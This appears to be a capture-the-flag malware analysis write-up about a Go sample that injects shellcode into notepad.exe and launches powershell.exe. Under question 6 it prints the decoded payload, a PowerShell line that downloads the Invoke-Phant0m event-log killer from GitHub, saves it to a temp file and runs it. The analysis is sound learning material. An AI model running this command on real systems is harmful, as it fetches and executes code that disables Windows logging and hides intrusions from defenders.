For full text search please use the '?' prefix. e.g. ? Onboarding

Reverse Engineering - Another Injection

I ran the sample with the following tools active to get information about the sample for the following questions:

  • FakeNet
  • Process Monitor
  • Process Explorer

  1. What is the language the program is written? (1 points)

    Running strings on the binary shows that it is written in Go.

    Answer: Golang

  2. What is the build id? (1 points)

    Running strings on the binary shows the text Go build ID: "eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq".

    Answer: eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq

  3. What is the dependency package the sample uses for invoking windows APIs (1 points)

    Uploading the sample to VirusTotal shows that it uses the github.com/TheTitanrain/w32 package.

    Answer: github.com/TheTitanrain/w32

  4. What is the victim process? (Hint: 32bit) (2 points)

    Answer: notepad.exe

  5. What is the process invoked from the shellcode? (1 points)

    Answer: powershell.exe

  6. What is the name of the created file? (2 points)

    Command (in Linux): strings main.exe | grep powershell

    CyberChef recipe: From Base64 ~> Decode text (UTF-16LE)

    Invoke-WebRequest "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/master/Invoke-Phant0m.ps1" -OutFile "C:\Windows\Temp\change.ps1"; Import-Module C:\Windows\Temp\change.ps1;Invoke-Phant0m;

    Answer: C:\Windows\Temp\change.ps1

  7. What is the name of the actual tool executed? (2 points)

    Answer: Invoke-Phant0m

Tags

  1. sysinternals (Private)
  2. disassembly (Private)
  3. reverse-engineering (Private)
  4. 10 points (Private)
  5. easy (Private)